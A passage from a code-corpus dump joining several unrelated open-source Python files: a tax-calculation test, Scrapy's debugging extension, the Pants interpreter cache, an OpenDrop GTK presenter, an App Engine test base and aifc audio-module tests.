                        {u'rate': 0.45, u'low_end': 180001.0}]},
                {
                    u'financial_year': u'2015-16',
                    u'brackets': [{u'rate': 0.0, u'low_end': 0.0},
                                  {u'rate': 0.19, u'low_end': 18201.0},
                                  {u'rate': 0.325, u'low_end': 37001.0},
                                  {u'rate': 0.37, u'low_end': 80001.0},
                                  {u'rate': 0.45, u'low_end': 180001.0}]
                }
            ]
        )

    def test_calculate_tax(self):
        # Spot-checks at/just below bracket boundaries; expected values are
        # presumably whole-dollar roundings of the bracket arithmetic --
        # verify against TaxRate.calculate_tax's rounding rule.
        self.assertEqual(
            self.instance.calculate_tax(18200),
            0
        )
        self.assertEqual(
            self.instance.calculate_tax(36999),
            3572
        )
        self.assertEqual(
            self.instance.calculate_tax(79999),
            17546
        )
        self.assertEqual(
            self.instance.calculate_tax(179999),
            54546
        )
agusc/scrapy
refs/heads/master
scrapy/extensions/debug.py
152
""" Extensions for debugging Scrapy See documentation in docs/topics/extensions.rst """ import sys import signal import logging import traceback import threading from pdb import Pdb from scrapy.utils.engine import format_engine_status from scrapy.utils.trackref import format_live_refs logger = logging.getLogger(__name__) class StackTraceDump(object): def __init__(self, crawler=None): self.crawler = crawler try: signal.signal(signal.SIGUSR2, self.dump_stacktrace) signal.signal(signal.SIGQUIT, self.dump_stacktrace) except AttributeError: # win32 platforms don't support SIGUSR signals pass @classmethod def from_crawler(cls, crawler): return cls(crawler) def dump_stacktrace(self, signum, frame): log_args = { 'stackdumps': self._thread_stacks(), 'enginestatus': format_engine_status(self.crawler.engine), 'liverefs': format_live_refs(), } logger.info("Dumping stack trace and engine status\n" "%(enginestatus)s\n%(liverefs)s\n%(stackdumps)s", log_args, extra={'crawler': self.crawler}) def _thread_stacks(self): id2name = dict((th.ident, th.name) for th in threading.enumerate()) dumps = '' for id_, frame in sys._current_frames().items(): name = id2name.get(id_, '') dump = ''.join(traceback.format_stack(frame)) dumps += "# Thread: {0}({1})\n{2}\n".format(name, id_, dump) return dumps class Debugger(object): def __init__(self): try: signal.signal(signal.SIGUSR2, self._enter_debugger) except AttributeError: # win32 platforms don't support SIGUSR signals pass def _enter_debugger(self, signum, frame): Pdb().set_trace(frame.f_back)
cevaris/pants
refs/heads/master
src/python/pants/backend/python/interpreter_cache.py
2
# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import os
import shutil

from pex.interpreter import PythonIdentity, PythonInterpreter
from pex.package import EggPackage, Package, SourcePackage
from pex.resolver import resolve
from twitter.common.collections import OrderedSet

from pants.backend.python.targets.python_target import PythonTarget
from pants.base.exceptions import TaskError
from pants.util.dirutil import safe_concurrent_creation, safe_mkdir


# TODO(wickman) Create a safer version of this and add to twitter.common.dirutil
def _safe_link(src, dst):
  # Repoint dst at src, tolerating a missing dst.  Not atomic: a concurrent
  # reader may briefly observe dst missing between the unlink and the symlink.
  try:
    os.unlink(dst)
  except OSError:
    # dst did not exist (or could not be removed); let os.symlink below
    # surface any real failure.
    pass
  os.symlink(src, dst)


class PythonInterpreterCache(object):
  """Discovers python interpreters on the host and caches them.

  Each cached interpreter lives in a directory (named after its identity)
  under ``python_setup.interpreter_cache_dir`` containing a ``python``
  symlink to the real binary, alongside resolved bootstrap requirements
  (setuptools and wheel).  ``setup()`` must be called before the
  ``interpreters`` property or ``matched_interpreters`` are useful.
  """

  @staticmethod
  def _matches(interpreter, filters):
    """True if the interpreter's identity satisfies at least one filter string."""
    return any(interpreter.identity.matches(filt) for filt in filters)

  @classmethod
  def _matching(cls, interpreters, filters):
    """Yield the subset of ``interpreters`` matching at least one filter."""
    for interpreter in interpreters:
      if cls._matches(interpreter, filters):
        yield interpreter

  @classmethod
  def select_interpreter(cls, compatibilities, allow_multiple=False):
    """Given a set of interpreters, either return them all if ``allow_multiple`` is ``True``;
    otherwise, return the lowest compatible interpreter.
    """
    if allow_multiple:
      return compatibilities
    # min() relies on PythonInterpreter's ordering to define "lowest".
    return [min(compatibilities)] if compatibilities else []

  def __init__(self, python_setup, python_repos, logger=None):
    """
    :param python_setup: Subsystem supplying ``interpreter_cache_dir``,
      ``interpreter_requirement`` and the setuptools/wheel bootstrap requirements.
    :param python_repos: Subsystem supplying fetchers and a network context used
      when resolving the bootstrap requirements.
    :param logger: Optional callable taking a message string; defaults to a no-op.
    """
    self._python_setup = python_setup
    self._python_repos = python_repos
    self._cache_dir = python_setup.interpreter_cache_dir
    safe_mkdir(self._cache_dir)
    self._interpreters = set()
    self._logger = logger or (lambda msg: True)
    # b'' matches every interpreter, so the default filter is "anything"
    # unless python_setup configured an explicit requirement.
    self._default_filters = (python_setup.interpreter_requirement or b'',)

  @property
  def interpreters(self):
    """Returns the set of cached interpreters."""
    return self._interpreters

  def select_interpreter_for_targets(self, targets):
    """Pick an interpreter compatible with all the specified targets."""
    allowed_interpreters = OrderedSet(self.interpreters)
    tgts_with_compatibilities = []  # Used only for error messages.

    # Constrain allowed_interpreters based on each target's compatibility requirements.
    for target in targets:
      if isinstance(target, PythonTarget) and target.compatibility:
        tgts_with_compatibilities.append(target)
        compatible_with_target = list(self.matched_interpreters(target.compatibility))
        allowed_interpreters &= compatible_with_target

    if not allowed_interpreters:
      # Create a helpful error message.
      unique_compatibilities = set(tuple(t.compatibility) for t in tgts_with_compatibilities)
      unique_compatibilities_strs = [','.join(x) for x in unique_compatibilities if x]
      tgts_with_compatibilities_strs = [str(t) for t in tgts_with_compatibilities]
      raise TaskError('Unable to detect a suitable interpreter for compatibilities: {} '
                      '(Conflicting targets: {})'.format(' && '.join(unique_compatibilities_strs),
                                                         ', '.join(tgts_with_compatibilities_strs)))

    # Return the lowest compatible interpreter.
    # NOTE(review): raises IndexError when no target constrained compatibility
    # and the cache holds no interpreters at all -- confirm callers always run
    # setup() first.
    return self.select_interpreter(allowed_interpreters)[0]

  def _interpreter_from_path(self, path, filters):
    """Reconstruct a cached interpreter from its cache directory.

    Returns ``None`` when the cached ``python`` symlink cannot be read or the
    identity encoded in the directory name fails every filter.
    """
    interpreter_dir = os.path.basename(path)
    identity = PythonIdentity.from_path(interpreter_dir)
    try:
      executable = os.readlink(os.path.join(path, 'python'))
    except OSError:
      return None
    interpreter = PythonInterpreter(executable, identity)
    if self._matches(interpreter, filters):
      # Make sure the bootstrap requirements are resolved before handing it out.
      return self._resolve(interpreter)
    return None

  def _setup_interpreter(self, interpreter, cache_target_path):
    """Materialize a cache directory for ``interpreter`` at ``cache_target_path``."""
    with safe_concurrent_creation(cache_target_path) as safe_path:
      os.mkdir(safe_path)  # Parent will already have been created by safe_concurrent_creation.
      os.symlink(interpreter.binary, os.path.join(safe_path, 'python'))
      return self._resolve(interpreter, safe_path)

  def _setup_cached(self, filters):
    """Find all currently-cached interpreters."""
    for interpreter_dir in os.listdir(self._cache_dir):
      path = os.path.join(self._cache_dir, interpreter_dir)
      pi = self._interpreter_from_path(path, filters)
      if pi:
        self._logger('Detected interpreter {}: {}'.format(pi.binary, str(pi.identity)))
        self._interpreters.add(pi)

  def _setup_paths(self, paths, filters):
    """Find interpreters under paths, and cache them."""
    for interpreter in self._matching(PythonInterpreter.all(paths), filters):
      identity_str = str(interpreter.identity)
      cache_path = os.path.join(self._cache_dir, identity_str)
      pi = self._interpreter_from_path(cache_path, filters)
      if pi is None:
        self._setup_interpreter(interpreter, cache_path)
        # Re-read through the cache so callers always get the cached variant.
        pi = self._interpreter_from_path(cache_path, filters)
        if pi is None:
          continue
      self._interpreters.add(pi)

  def matched_interpreters(self, filters):
    """Given some filters, yield any interpreter that matches at least one of them.

    :param filters: A sequence of strings that constrain the interpreter compatibility for this
      cache, using the Requirement-style format, e.g. ``'CPython>=3', or just ['>=2.7','<3']``
      for requirements agnostic to interpreter class.
    """
    for match in self._matching(self.interpreters, filters):
      yield match

  def setup(self, paths=(), force=False, filters=(b'',)):
    """Sets up a cache of python interpreters.

    NB: Must be called prior to accessing the ``interpreters`` property or the ``matches`` method.

    :param paths: The paths to search for a python interpreter; the system ``PATH`` by default.
    :param bool force: When ``True`` the interpreter cache is always re-built.
    :param filters: A sequence of strings that constrain the interpreter compatibility for this
      cache, using the Requirement-style format, e.g. ``'CPython>=3', or just ['>=2.7','<3']``
      for requirements agnostic to interpreter class.
    """
    filters = self._default_filters if not any(filters) else filters
    setup_paths = paths or os.getenv('PATH').split(os.pathsep)
    self._setup_cached(filters)
    def unsatisfied_filters():
      # NOTE(review): depends on Python 2 filter() returning a list so that
      # len() works below; under Python 3 this would raise TypeError.
      return filter(lambda f: len(list(self._matching(self.interpreters, [f]))) == 0, filters)
    if force or len(unsatisfied_filters()) > 0:
      self._setup_paths(setup_paths, filters)
    for filt in unsatisfied_filters():
      self._logger('No valid interpreters found for {}!'.format(filt))
    matches = list(self.matched_interpreters(filters))
    if len(matches) == 0:
      self._logger('Found no valid interpreters!')
    return matches

  def _resolve(self, interpreter, interpreter_dir=None):
    """Resolve and cache an interpreter with a setuptools and wheel capability."""
    interpreter = self._resolve_interpreter(interpreter, interpreter_dir,
                                            self._python_setup.setuptools_requirement())
    if interpreter:
      return self._resolve_interpreter(interpreter, interpreter_dir,
                                       self._python_setup.wheel_requirement())

  def _resolve_interpreter(self, interpreter, interpreter_dir, requirement):
    """Given a :class:`PythonInterpreter` and a requirement, return an interpreter with the
    capability of resolving that requirement or ``None`` if it's not possible to install a
    suitable requirement.

    If interpreter_dir is unspecified, operates on the default location.
    """
    if interpreter.satisfies([requirement]):
      return interpreter
    if not interpreter_dir:
      interpreter_dir = os.path.join(self._cache_dir, str(interpreter.identity))
    target_link = os.path.join(interpreter_dir, requirement.key)
    bdist = self._resolve_and_link(interpreter, requirement, target_link)
    if bdist:
      return interpreter.with_extra(bdist.name, bdist.raw_version, bdist.path)
    else:
      # Implicitly returns None: callers treat that as "capability unavailable".
      self._logger('Failed to resolve requirement {} for {}'.format(requirement, interpreter))

  def _resolve_and_link(self, interpreter, requirement, target_link):
    """Resolve ``requirement`` for ``interpreter``, move the resulting distribution
    next to ``target_link`` and point ``target_link`` at it; returns the Package
    or ``None`` if resolution failed.
    """
    # Short-circuit if there is a local copy.
    if os.path.exists(target_link) and os.path.exists(os.path.realpath(target_link)):
      bdist = Package.from_href(os.path.realpath(target_link))
      if bdist.satisfies(requirement):
        return bdist

    # Since we're resolving to bootstrap a bare interpreter, we won't have wheel available.
    # Explicitly set the precedence to avoid resolution of wheels or distillation of sdists into
    # wheels.
    precedence = (EggPackage, SourcePackage)
    distributions = resolve(requirements=[requirement],
                            fetchers=self._python_repos.get_fetchers(),
                            interpreter=interpreter,
                            context=self._python_repos.get_network_context(),
                            precedence=precedence)
    if not distributions:
      return None

    assert len(distributions) == 1, ('Expected exactly 1 distribution to be resolved for {}, '
                                     'found:\n\t{}'.format(requirement,
                                                           '\n\t'.join(map(str, distributions))))

    dist_location = distributions[0].location
    target_location = os.path.join(os.path.dirname(target_link), os.path.basename(dist_location))
    shutil.move(dist_location, target_location)
    _safe_link(target_location, target_link)
    self._logger('  installed {}'.format(target_location))
    return Package.from_href(target_location)
jdber1/opendrop
refs/heads/master
opendrop/app/ift/report/overview/detail/detail.py
2
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com)
# OpenDrop is released under the GNU GPL License. You are free to
# modify and distribute the code, but always under the same license
# (i.e. you cannot make commercial derivatives).
#
# If you use this software in your research, please cite the following
# journal articles:
#
# J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and
# R. F. Tabor, Measurement of surface and interfacial tension using
# pendant drop tensiometry. Journal of Colloid and Interface Science 454
# (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012
#
# E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor
# and J. D. Berry, OpenDrop: Open-source software for pendant drop
# tensiometry & contact angle measurements, submitted to the Journal of
# Open Source Software
#
# These citations help us not only to understand who is using and
# developing OpenDrop, and for what purpose, but also to justify
# continued development of this code and other open source resources.
#
# OpenDrop is distributed WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this software. If not, see <https://www.gnu.org/licenses/>.

from typing import Optional

from gi.repository import GObject, Gtk

from opendrop.app.ift.services.analysis import PendantAnalysisJob
from opendrop.appfw import Presenter, TemplateChild, component, install


@component(
    template_path='./detail.ui',
)
class IFTReportOverviewDetailPresenter(Presenter[Gtk.Stack]):
    """Detail pane of the IFT report overview.

    Shows a "no data" placeholder until the bound analysis has produced an
    image, then switches the Gtk.Stack to the real content widget.
    """

    # Widgets bound from detail.ui.
    no_data_label = TemplateChild('no_data_label')
    content = TemplateChild('content')

    # Backing store for the `analysis` property.
    _analysis = None
    # Live connections to the bound analysis's event buses; reset on rebind.
    event_connections = ()
    # True once the template widgets exist; guards stack-switching calls.
    view_ready = False

    def after_view_init(self) -> None:
        # Re-assigning the property runs the setter now that the view exists,
        # so the correct stack child becomes visible initially.
        self.view_ready = True

        # Invoke setter.
        self.analysis = self.analysis

    @install
    @GObject.Property
    def analysis(self) -> Optional[PendantAnalysisJob]:
        """The analysis job this pane displays, or None for no selection."""
        return self._analysis

    @analysis.setter
    def analysis(self, value: Optional[PendantAnalysisJob]) -> None:
        # Drop subscriptions to the previously bound analysis first so stale
        # callbacks cannot fire after rebinding.
        for conn in self.event_connections:
            conn.disconnect()
        self.event_connections = ()

        self._analysis = value

        if self._analysis is None:
            self.show_waiting_placeholder()
            return

        # Re-evaluate which stack child to show whenever the image changes.
        self.event_connections = (
            self._analysis.bn_image.on_changed.connect(self.hdl_analysis_image_changed),
        )

        self.hdl_analysis_image_changed()

    def hdl_analysis_image_changed(self) -> None:
        # No analysis, or no image yet -> keep showing the placeholder.
        if self._analysis is None or self._analysis.bn_image.get() is None:
            self.show_waiting_placeholder()
        else:
            self.hide_waiting_placeholder()

    def show_waiting_placeholder(self) -> None:
        if not self.view_ready:
            return
        # NOTE(review): self.host is presumably the Gtk.Stack supplied by the
        # Presenter[Gtk.Stack] base class -- confirm against appfw.Presenter.
        self.host.set_visible_child(self.no_data_label)

    def hide_waiting_placeholder(self) -> None:
        if not self.view_ready:
            return
        self.host.set_visible_child(self.content)

    def destroy(self, *_) -> None:
        # Unbinding via the property setter disconnects all event handlers.
        self.analysis = None
iSCInc/status
refs/heads/master
tests/base.py
13
try:
    import json
except ImportError:
    import simplejson as json
import os
import unittest

from google.appengine.ext import testbed


def load_schemas(path):
    """Load every ``*.json`` file in *path*.

    :param path: directory to scan (non-recursively).
    :returns: dict mapping base filename (without extension) to the parsed
        JSON document.
    """
    schemas = {}
    for f in os.listdir(path):
        filename, ext = os.path.splitext(f)
        if ext == ".json":
            # Use a context manager so the file handle is closed promptly;
            # the original `json.load(open(...))` leaked the handle.
            with open(os.path.join(path, f)) as fp:
                schemas[filename] = json.load(fp)
    return schemas


class TestbedTest(unittest.TestCase):
    """Base test case that activates the App Engine testbed with a
    datastore stub, and deactivates it afterwards."""

    def setUp(self):
        self.testbed = testbed.Testbed()
        self.testbed.activate()
        self.testbed.init_datastore_v3_stub()

    def tearDown(self):
        self.testbed.deactivate()
Jeff-Tian/mybnb
refs/heads/master
Python27/Lib/test/test_aifc.py
1
"""Regression tests for the Python 2 ``aifc`` module.

Fixes relative to the original:
  * ``test_main`` registered ``AifcPCM16Test`` twice (and therefore ran it
    twice); each class is now listed exactly once.
  * ``AIFCLowLevelTest.test_read_written``'s inner helper was declared as
    ``read_written(self, what)`` although callers passed the value under test
    as the first argument; it only worked because the body read ``x`` from
    the enclosing loop.  The parameter is now named ``x`` and actually used.
"""
from test.test_support import (findfile, TESTFN, unlink, captured_stdout,
                               run_unittest)
import unittest
from test import audiotests
import os
import io
import sys
import struct
import aifc


class AifcTest(audiotests.AudioWriteTests,
               audiotests.AudioTestsWithSourceFile):
    """Shared configuration for the round-trip tests below."""
    module = aifc
    close_fd = True
    test_unseekable_read = None


class AifcPCM8Test(AifcTest, unittest.TestCase):
    sndfilename = 'pluck-pcm8.aiff'
    sndfilenframes = 3307
    nchannels = 2
    sampwidth = 1
    framerate = 11025
    nframes = 48
    comptype = 'NONE'
    compname = 'not compressed'
    frames = audiotests.fromhex("""\
      02FF 4B00 3104 8008 CB06 4803 BF01 03FE B8FA B4F3 29EB 1AE6 \
      EDE4 C6E2 0EE0 EFE0 57E2 FBE8 13EF D8F7 97FB F5FC 08FB DFFB \
      11FA 3EFB BCFC 66FF CF04 4309 C10E 5112 EE17 8216 7F14 8012 \
      490E 520D EF0F CE0F E40C 630A 080A 2B0B 510E 8B11 B60E 440A \
      """)


class AifcPCM16Test(AifcTest, unittest.TestCase):
    sndfilename = 'pluck-pcm16.aiff'
    sndfilenframes = 3307
    nchannels = 2
    sampwidth = 2
    framerate = 11025
    nframes = 48
    comptype = 'NONE'
    compname = 'not compressed'
    frames = audiotests.fromhex("""\
      022EFFEA 4B5D00F6 311804EA 80E10840 CBE106B1 48A903F5 BFE601B2 036CFE7B \
      B858FA3E B4B1F34F 299AEBCA 1A5DE6DA EDFAE491 C628E275 0E09E0B5 EF2AE029 \
      5758E271 FB35E83F 1376EF86 D82BF727 9790FB76 F5FAFC0F 0867FB9C DF30FB43 \
      117EFA36 3EE5FB5B BC79FCB1 66D9FF5D CF150412 431D097C C1BA0EC8 512112A1 \
      EEE21753 82071665 7FFF1443 8004128F 49A20EAF 52BB0DBA EFB40F60 CE3C0FBF \
      E4B30CEC 63430A5C 08C80A20 2BBB0B08 514A0E43 8BCF1139 B6F60EEB 44120A5E \
      """)


class AifcPCM24Test(AifcTest, unittest.TestCase):
    sndfilename = 'pluck-pcm24.aiff'
    sndfilenframes = 3307
    nchannels = 2
    sampwidth = 3
    framerate = 11025
    nframes = 48
    comptype = 'NONE'
    compname = 'not compressed'
    frames = audiotests.fromhex("""\
      022D65FFEB9D 4B5A0F00FA54 3113C304EE2B 80DCD6084303 \
      CBDEC006B261 48A99803F2F8 BFE82401B07D 036BFBFE7B5D \
      B85756FA3EC9 B4B055F3502B 299830EBCB62 1A5CA7E6D99A \
      EDFA3EE491BD C625EBE27884 0E05A9E0B6CF EF2929E02922 \
      5758D8E27067 FB3557E83E16 1377BFEF8402 D82C5BF7272A \
      978F16FB7745 F5F865FC1013 086635FB9C4E DF30FCFB40EE \
      117FE0FA3438 3EE6B8FB5AC3 BC77A3FCB2F4 66D6DAFF5F32 \
      CF13B9041275 431D69097A8C C1BB600EC74E 5120B912A2BA \
      EEDF641754C0 8207001664B7 7FFFFF14453F 8000001294E6 \
      499C1B0EB3B2 52B73E0DBCA0 EFB2B20F5FD8 CE3CDB0FBE12 \
      E4B49C0CEA2D 6344A80A5A7C 08C8FE0A1FFE 2BB9860B0A0E \
      51486F0E44E1 8BCC64113B05 B6F4EC0EEB36 4413170A5B48 \
      """)


class AifcPCM32Test(AifcTest, unittest.TestCase):
    sndfilename = 'pluck-pcm32.aiff'
    sndfilenframes = 3307
    nchannels = 2
    sampwidth = 4
    framerate = 11025
    nframes = 48
    comptype = 'NONE'
    compname = 'not compressed'
    frames = audiotests.fromhex("""\
      022D65BCFFEB9D92 4B5A0F8000FA549C 3113C34004EE2BC0 80DCD680084303E0 \
      CBDEC0C006B26140 48A9980003F2F8FC BFE8248001B07D92 036BFB60FE7B5D34 \
      B8575600FA3EC920 B4B05500F3502BC0 29983000EBCB6240 1A5CA7A0E6D99A60 \
      EDFA3E80E491BD40 C625EB80E27884A0 0E05A9A0E0B6CFE0 EF292940E0292280 \
      5758D800E2706700 FB3557D8E83E1640 1377BF00EF840280 D82C5B80F7272A80 \
      978F1600FB774560 F5F86510FC101364 086635A0FB9C4E20 DF30FC40FB40EE28 \
      117FE0A0FA3438B0 3EE6B840FB5AC3F0 BC77A380FCB2F454 66D6DA80FF5F32B4 \
      CF13B980041275B0 431D6980097A8C00 C1BB60000EC74E00 5120B98012A2BAA0 \
      EEDF64C01754C060 820700001664B780 7FFFFFFF14453F40 800000001294E6E0 \
      499C1B000EB3B270 52B73E000DBCA020 EFB2B2E00F5FD880 CE3CDB400FBE1270 \
      E4B49CC00CEA2D90 6344A8800A5A7CA0 08C8FE800A1FFEE0 2BB986C00B0A0E00 \
      51486F800E44E190 8BCC6480113B0580 B6F4EC000EEB3630 441317800A5B48A0 \
      """)


class AifcULAWTest(AifcTest, unittest.TestCase):
    sndfilename = 'pluck-ulaw.aifc'
    sndfilenframes = 3307
    nchannels = 2
    sampwidth = 2
    framerate = 11025
    nframes = 48
    comptype = 'ulaw'
    compname = ''
    frames = audiotests.fromhex("""\
      022CFFE8 497C0104 307C04DC 8284083C CB84069C 497C03DC BE8401AC 036CFE74 \
      B684FA24 B684F344 2A7CEC04 19FCE704 EE04E504 C584E204 0E3CE104 EF04DF84 \
      557CE204 FB24E804 12FCEF04 D784F744 9684FB64 F5C4FC24 083CFBA4 DF84FB24 \
      11FCFA24 3E7CFB64 BA84FCB4 657CFF5C CF84041C 417C093C C1840EBC 517C12FC \
      EF0416FC 828415FC 7D7C13FC 828412FC 497C0EBC 517C0DBC F0040F3C CD840FFC \
      E5040CBC 617C0A3C 08BC0A3C 2C7C0B3C 517C0E3C 8A8410FC B6840EBC 457C0A3C \
      """)
    # Reference data is big-endian; adjust for little-endian hosts.
    if sys.byteorder != 'big':
        frames = audiotests.byteswap2(frames)


class AifcMiscTest(audiotests.AudioTests, unittest.TestCase):
    def test_skipunknown(self):
        #Issue 2245
        #This file contains chunk types aifc doesn't recognize.
        self.f = aifc.open(findfile('Sine-1000Hz-300ms.aif'))

    def test_write_markers_values(self):
        fout = aifc.open(io.BytesIO(), 'wb')
        self.assertEqual(fout.getmarkers(), None)
        fout.setmark(1, 0, 'foo1')
        fout.setmark(1, 1, 'foo2')  # Re-setting mark id 1 replaces it.
        self.assertEqual(fout.getmark(1), (1, 1, 'foo2'))
        self.assertEqual(fout.getmarkers(), [(1, 1, 'foo2')])
        fout.initfp(None)

    def test_read_markers(self):
        fout = self.fout = aifc.open(TESTFN, 'wb')
        fout.aiff()
        fout.setparams((1, 1, 1, 1, 'NONE', ''))
        fout.setmark(1, 0, 'odd')
        fout.setmark(2, 0, 'even')
        fout.writeframes('\x00')
        fout.close()
        f = self.f = aifc.open(TESTFN, 'rb')
        self.assertEqual(f.getmarkers(), [(1, 0, 'odd'), (2, 0, 'even')])
        self.assertEqual(f.getmark(1), (1, 0, 'odd'))
        self.assertEqual(f.getmark(2), (2, 0, 'even'))
        self.assertRaises(aifc.Error, f.getmark, 3)


class AIFCLowLevelTest(unittest.TestCase):

    def test_read_written(self):
        def read_written(x, what):
            # Round-trip x through aifc._write_<what> / aifc._read_<what>.
            f = io.BytesIO()
            getattr(aifc, '_write_' + what)(f, x)
            f.seek(0)
            return getattr(aifc, '_read_' + what)(f)
        for x in (-1, 0, 0.1, 1):
            self.assertEqual(read_written(x, 'float'), x)
        for x in (float('NaN'), float('Inf')):
            self.assertEqual(read_written(x, 'float'), aifc._HUGE_VAL)
        for x in ('', 'foo', 'a' * 255):
            self.assertEqual(read_written(x, 'string'), x)
        for x in (-0x7FFFFFFF, -1, 0, 1, 0x7FFFFFFF):
            self.assertEqual(read_written(x, 'long'), x)
        for x in (0, 1, 0xFFFFFFFF):
            self.assertEqual(read_written(x, 'ulong'), x)
        for x in (-0x7FFF, -1, 0, 1, 0x7FFF):
            self.assertEqual(read_written(x, 'short'), x)
        for x in (0, 1, 0xFFFF):
            self.assertEqual(read_written(x, 'ushort'), x)

    def test_read_raises(self):
        f = io.BytesIO('\x00')
        self.assertRaises(EOFError, aifc._read_ulong, f)
        self.assertRaises(EOFError, aifc._read_long, f)
        self.assertRaises(EOFError, aifc._read_ushort, f)
        self.assertRaises(EOFError, aifc._read_short, f)

    def test_write_long_string_raises(self):
        f = io.BytesIO()
        with self.assertRaises(ValueError):
            aifc._write_string(f, 'too long' * 255)

    def test_wrong_open_mode(self):
        with self.assertRaises(aifc.Error):
            aifc.open(TESTFN, 'wrong_mode')

    def test_read_wrong_form(self):
        b1 = io.BytesIO('WRNG' + struct.pack('>L', 0))
        b2 = io.BytesIO('FORM' + struct.pack('>L', 4) + 'WRNG')
        self.assertRaises(aifc.Error, aifc.open, b1)
        self.assertRaises(aifc.Error, aifc.open, b2)

    def test_read_no_comm_chunk(self):
        b = io.BytesIO('FORM' + struct.pack('>L', 4) + 'AIFF')
        self.assertRaises(aifc.Error, aifc.open, b)

    def test_read_wrong_compression_type(self):
        b = 'FORM' + struct.pack('>L', 4) + 'AIFC'
        b += 'COMM' + struct.pack('>LhlhhLL', 23, 0, 0, 0, 0, 0, 0)
        b += 'WRNG' + struct.pack('B', 0)
        self.assertRaises(aifc.Error, aifc.open, io.BytesIO(b))

    def test_read_wrong_marks(self):
        b = 'FORM' + struct.pack('>L', 4) + 'AIFF'
        b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0)
        b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8
        b += 'MARK' + struct.pack('>LhB', 3, 1, 1)
        with captured_stdout() as s:
            f = aifc.open(io.BytesIO(b))
        self.assertEqual(s.getvalue(), 'Warning: MARK chunk contains '
                                       'only 0 markers instead of 1\n')
        self.assertEqual(f.getmarkers(), None)

    def test_read_comm_kludge_compname_even(self):
        b = 'FORM' + struct.pack('>L', 4) + 'AIFC'
        b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0)
        b += 'NONE' + struct.pack('B', 4) + 'even' + '\x00'
        b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8
        with captured_stdout() as s:
            f = aifc.open(io.BytesIO(b))
        self.assertEqual(s.getvalue(), 'Warning: bad COMM chunk size\n')
        self.assertEqual(f.getcompname(), 'even')

    def test_read_comm_kludge_compname_odd(self):
        b = 'FORM' + struct.pack('>L', 4) + 'AIFC'
        b += 'COMM' + struct.pack('>LhlhhLL', 18, 0, 0, 0, 0, 0, 0)
        b += 'NONE' + struct.pack('B', 3) + 'odd'
        b += 'SSND' + struct.pack('>L', 8) + '\x00' * 8
        with captured_stdout() as s:
            f = aifc.open(io.BytesIO(b))
        self.assertEqual(s.getvalue(), 'Warning: bad COMM chunk size\n')
        self.assertEqual(f.getcompname(), 'odd')

    def test_write_params_raises(self):
        fout = aifc.open(io.BytesIO(), 'wb')
        wrong_params = (0, 0, 0, 0, 'WRNG', '')
        self.assertRaises(aifc.Error, fout.setparams, wrong_params)
        self.assertRaises(aifc.Error, fout.getparams)
        self.assertRaises(aifc.Error, fout.setnchannels, 0)
        self.assertRaises(aifc.Error, fout.getnchannels)
        self.assertRaises(aifc.Error, fout.setsampwidth, 0)
        self.assertRaises(aifc.Error, fout.getsampwidth)
        self.assertRaises(aifc.Error, fout.setframerate, 0)
        self.assertRaises(aifc.Error, fout.getframerate)
        self.assertRaises(aifc.Error, fout.setcomptype, 'WRNG', '')
        fout.aiff()
        fout.setnchannels(1)
        fout.setsampwidth(1)
        fout.setframerate(1)
        fout.setnframes(1)
        fout.writeframes('\x00')
        # After frames have been written the parameters are frozen.
        self.assertRaises(aifc.Error, fout.setparams, (1, 1, 1, 1, 1, 1))
        self.assertRaises(aifc.Error, fout.setnchannels, 1)
        self.assertRaises(aifc.Error, fout.setsampwidth, 1)
        self.assertRaises(aifc.Error, fout.setframerate, 1)
        self.assertRaises(aifc.Error, fout.setnframes, 1)
        self.assertRaises(aifc.Error, fout.setcomptype, 'NONE', '')
        self.assertRaises(aifc.Error, fout.aiff)
        self.assertRaises(aifc.Error, fout.aifc)

    def test_write_params_singles(self):
        fout = aifc.open(io.BytesIO(), 'wb')
        fout.aifc()
        fout.setnchannels(1)
        fout.setsampwidth(2)
        fout.setframerate(3)
        fout.setnframes(4)
        fout.setcomptype('NONE', 'name')
        self.assertEqual(fout.getnchannels(), 1)
        self.assertEqual(fout.getsampwidth(), 2)
        self.assertEqual(fout.getframerate(), 3)
        self.assertEqual(fout.getnframes(), 0)
        self.assertEqual(fout.tell(), 0)
        self.assertEqual(fout.getcomptype(), 'NONE')
        self.assertEqual(fout.getcompname(), 'name')
        fout.writeframes('\x00' * 4 * fout.getsampwidth() * fout.getnchannels())
        self.assertEqual(fout.getnframes(), 4)
        self.assertEqual(fout.tell(), 4)

    def test_write_params_bunch(self):
        fout = aifc.open(io.BytesIO(), 'wb')
        fout.aifc()
        p = (1, 2, 3, 4, 'NONE', 'name')
        fout.setparams(p)
        self.assertEqual(fout.getparams(), p)
        fout.initfp(None)

    def test_write_header_raises(self):
        # Closing before all mandatory parameters are set must fail.
        fout = aifc.open(io.BytesIO(), 'wb')
        self.assertRaises(aifc.Error, fout.close)
        fout = aifc.open(io.BytesIO(), 'wb')
        fout.setnchannels(1)
        self.assertRaises(aifc.Error, fout.close)
        fout = aifc.open(io.BytesIO(), 'wb')
        fout.setnchannels(1)
        fout.setsampwidth(1)
        self.assertRaises(aifc.Error, fout.close)

    def test_write_header_comptype_raises(self):
        for comptype in ('ULAW', 'ulaw', 'ALAW', 'alaw', 'G722'):
            fout = aifc.open(io.BytesIO(), 'wb')
            fout.setsampwidth(1)
            fout.setcomptype(comptype, '')
            self.assertRaises(aifc.Error, fout.close)
            fout.initfp(None)

    def test_write_markers_raises(self):
        fout = aifc.open(io.BytesIO(), 'wb')
        self.assertRaises(aifc.Error, fout.setmark, 0, 0, '')
        self.assertRaises(aifc.Error, fout.setmark, 1, -1, '')
        self.assertRaises(aifc.Error, fout.setmark, 1, 0, None)
        self.assertRaises(aifc.Error, fout.getmark, 1)
        fout.initfp(None)

